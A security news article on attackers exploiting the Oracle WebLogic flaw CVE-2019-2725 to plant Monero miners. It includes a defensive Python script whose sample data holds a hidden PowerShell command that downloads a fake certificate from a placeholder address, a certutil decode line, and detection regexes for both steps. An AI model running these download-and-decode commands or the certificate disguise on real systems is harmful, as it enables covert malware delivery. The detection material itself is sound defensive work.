CVE-2019-2725 Oracle WebLogic Server Flaw Leads To Monero Miner Infections

The CVE-2019-2725 vulnerability in Oracle WebLogic Server is being abused by attackers to infect hosts with Monero miners. Several security reports indicate that criminal groups are exploiting the bug and intend to infect as many machines as possible with cryptocurrency-mining malware.




The CVE-2019-2725 Oracle WebLogic Server Flaw Is Used To Infect Hosts With Monero Miners

Oracle WebLogic Server, one of the most widely deployed enterprise Java application servers, has been found to carry a dangerous flaw. It is tracked as CVE-2019-2725: a deserialization bug in the server's wls9_async_response and wls-wsat web service components that lets an unauthenticated remote attacker execute arbitrary code on the host. In this campaign the attackers use it to launch a PowerShell command on the server, which downloads a file disguised as a certificate. The Windows certutil utility is then used to decode that file, and the decoded content is unpacked into the actual payload. In the current attack the final payload is a Monero miner.

During this particular campaign the following files were deployed onto the victim computers:

  • Sysupdate.exe — This is the main Monero miner file
  • Config.json — This is the accompanying configuration file
  • Networkservce.exe — This is another module which is probably being used for the distribution of the payloads.
  • Update.ps1 — This file contains the PowerShell script which is run in memory.
  • Sysguard.exe — This is the watchdog that monitors the activity of the Monero miner.
  • Clean.bat — This is the clean-up utility.
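The delivery chain above (a PowerShell download followed by certutil decoding a fake certificate) leaves two things a defender can look for: the command lines themselves, and certificate files whose base64 body is not actually a certificate. The Python script below is an added example, not code from the original article or from the campaign it describes. The command lines, the PEM blobs, the file names and the 192.0.2.10 address are all constructed here for illustration.

```python
import base64
import binascii
import re

# --- Constructed sample data (not from the original article or the real campaign) ---
# Process-creation command lines as a log source might record them. The paths and
# file names are placeholders; 192.0.2.10 is a documentation-only address.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\certutil.exe -decode C:\Users\Public\cert.cer C:\Users\Public\sys.exe",
    r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://192.0.2.10/cert.cer','C:\Users\Public\cert.cer')",
    r"C:\Windows\System32\certutil.exe -verify C:\certs\corp-ca.cer",
    r"C:\Oracle\Middleware\jdk\bin\java.exe -server -Xms256m weblogic.Server",
]

# Patterns for the two steps of the delivery chain: a PowerShell download, then
# certutil used as a decoder. Tune these to your environment before deploying.
SUSPICIOUS_PATTERNS = [
    re.compile(r"certutil(\.exe)?\s.*-decode", re.I),
    re.compile(r"powershell.*(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b)", re.I),
]

PEM_RE = re.compile(r"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)


def flag_command_lines(lines):
    """Return the command lines that match any of the suspicious patterns."""
    return [line for line in lines if any(p.search(line) for p in SUSPICIOUS_PATTERNS)]


def classify_pem_payload(text):
    """Decode a PEM-style wrapper and report what its base64 body really contains.

    A real X.509 certificate is DER-encoded, so its first byte is 0x30 (an ASN.1
    SEQUENCE). A Windows executable begins with the 'MZ' DOS header. The wrapper
    alone proves nothing: certutil -decode strips it and base64-decodes whatever
    is inside, which is exactly what this campaign relies on.
    """
    m = PEM_RE.search(text)
    if not m:
        return "not-pem"
    try:
        raw = base64.b64decode(m.group(2))
    except (binascii.Error, ValueError):
        return "bad-base64"
    if raw[:2] == b"MZ":
        return "pe-executable"
    if raw[:1] == b"\x30":
        return "der-certificate"
    return "unknown"


def wrap_as_certificate(blob):
    """Build a certutil-compatible '.cer' wrapper around arbitrary bytes (test helper)."""
    body = base64.encodebytes(blob).decode("ascii")
    return "-----BEGIN CERTIFICATE-----\n" + body + "-----END CERTIFICATE-----\n"


if __name__ == "__main__":
    for hit in flag_command_lines(SAMPLE_CMDLINES):
        print("SUSPICIOUS:", hit)
    # Constructed blobs: a fake DOS/PE header and a fake DER certificate prefix.
    disguised_pe = wrap_as_certificate(b"MZ\x90\x00" + bytes(60))
    real_cert_prefix = wrap_as_certificate(b"\x30\x82\x03\x10" + bytes(16))
    print("disguised PE  ->", classify_pem_payload(disguised_pe))
    print("DER prefix    ->", classify_pem_payload(real_cert_prefix))
```

The first check is cheap to run over EDR or Sysmon process-creation events; the second can be pointed at any .cer or .crt file that lands in a world-writable directory on a WebLogic host. Neither replaces patching, but together they catch this campaign's specific trick even if the miner binary itself is repacked.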

The defining characteristic of this campaign is its obfuscation: the payload is delivered wrapped as a security certificate file, so it passes as harmless data and is decoded on the host with a legitimate system tool. The miner installs itself as a persistent threat, which makes it difficult to remove, and the mining tasks it runs place a heavy toll on the performance and stability of the system. Each completed mining job credits the criminals with cryptocurrency paid directly to their wallets. Oracle patched the vulnerability in an out-of-band security alert in April 2019 and is urging customers to update their installations as soon as possible.

Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.
